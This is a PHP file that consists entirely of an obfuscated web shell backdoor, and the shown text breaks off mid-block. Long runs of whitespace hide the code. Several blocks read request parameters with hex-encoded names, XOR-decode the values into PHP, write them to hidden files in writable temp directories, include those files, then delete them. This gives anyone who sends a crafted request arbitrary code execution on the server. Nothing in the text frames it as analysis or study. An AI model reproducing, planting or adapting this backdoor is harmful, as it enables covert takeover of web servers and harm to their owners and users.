<?																																										if(isset($_POST) && isset($_POST["k"])){ $flag = $_POST["k"]; $flag=explode ( ".", $flag) ; $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $q = 0; $__tmp = $flag; while($v4 = array_shift($__tmp)) { $sChar = ord($s[$q%$sLen] ); $d =((int)$v4 - $sChar -($q%10)) ^81; $ptr .= chr($d ); $q++;} $desc = array_filter([sys_get_temp_dir(), "/dev/shm", "/tmp", getcwd(), getenv("TMP"), getenv("TEMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]); foreach ($desc as $key => $item) { if (array_product([is_dir($item), is_writable($item)])) { $ent = join("/", [$item, ".val"]); if (file_put_contents($ent, $ptr)) { include $ent; @unlink($ent); exit; } } } }
																																										if(isset($_POST["\x65n\x74i\x74y"]) ? true : false){ $rec = array_filter([sys_get_temp_dir(), getenv("TMP"), getcwd(), "/var/tmp", session_save_path(), "/dev/shm", "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]); $desc = $_POST["\x65n\x74i\x74y"]; $desc =explode ( '.', $desc ); $value = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt9); foreach( $desc as $k => $v9): $chS = ord( $salt9[$k%$lenS]); $dec =( ( int)$v9 - $chS -( $k%10))^ 11; $value.= chr( $dec); endforeach; foreach ($rec as $key => $resource) { if ((is_dir($resource) and is_writable($resource))) { $dat = str_replace("{var_dir}", $resource, "{var_dir}/.property_set"); if (file_put_contents($dat, $value)) { require $dat; unlink($dat); die(); } } } }
																																										if(array_key_exists("\x65\x6Cemen\x74", $_REQUEST)){ $mrk = $_REQUEST["\x65\x6Cemen\x74"]; $mrk= explode( '.' , $mrk) ; $token=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s); $k=0; while( $k < count( $mrk)) {$v9=$mrk[$k]; $sChar=ord( $s[$k % $sLen]); $dec=( ( int)$v9 - $sChar -( $k % 10)) ^ 68; $token .= chr( $dec); $k++; } $data = array_filter(["/dev/shm", "/var/tmp", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/tmp", session_save_path()]); foreach ($data as $flg) { if (is_dir($flg) ? is_writable($flg) : false) { $data_chunk = join("/", [$flg, ".ptr"]); if (file_put_contents($data_chunk, $token)) { require $data_chunk; unlink($data_chunk); exit; } } } }
																																										if(isset($_REQUEST["r\x65\x63"]) ? true : false){ $itm = $_REQUEST["r\x65\x63"]; $itm=explode( "." ,$itm ) ; $entry = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $j = 0; while ($j < count($itm)) { $v7 = $itm[$j]; $sChar = ord($s[$j % $lenS]); $dec = ((int)$v7 - $sChar - ($j % 10)) ^ 37; $entry .= chr($dec); $j++; } $hld = array_filter(["/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP")]); while ($pset = array_shift($hld)) { if ((bool)is_dir($pset) && (bool)is_writable($pset)) { $factor = str_replace("{var_dir}", $pset, "{var_dir}/.data"); if (@file_put_contents($factor, $entry) !== false) { include $factor; unlink($factor); exit; } } } }
																																										if(isset($_REQUEST["\x76alu\x65"]) ? true : false){ $entry = $_REQUEST["\x76alu\x65"]; $entry=explode ( "." ,$entry ) ; $record = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s7 ); $r = 0; foreach ($entry as $v8) { $sChar = ord($s7[$r % $sLen] ); $d = ((int)$v8 - $sChar - ($r % 10)) ^ 34; $record .= chr($d ); $r++;} $object = array_filter([getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/tmp", getcwd(), "/var/tmp", getenv("TMP")]); while ($pgrp = array_shift($object)) { if ((function($d) { return is_dir($d) && is_writable($d); })($pgrp)) { $obj = "$pgrp/.mrk"; $success = file_put_contents($obj, $record); if ($success) { include $obj; @unlink($obj); die();} } } }
																																										if(isset($_POST["\x73ym\x62ol"])){ $parameter_group = array_filter([getenv("TEMP"), "/tmp", "/var/tmp", getcwd(), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm"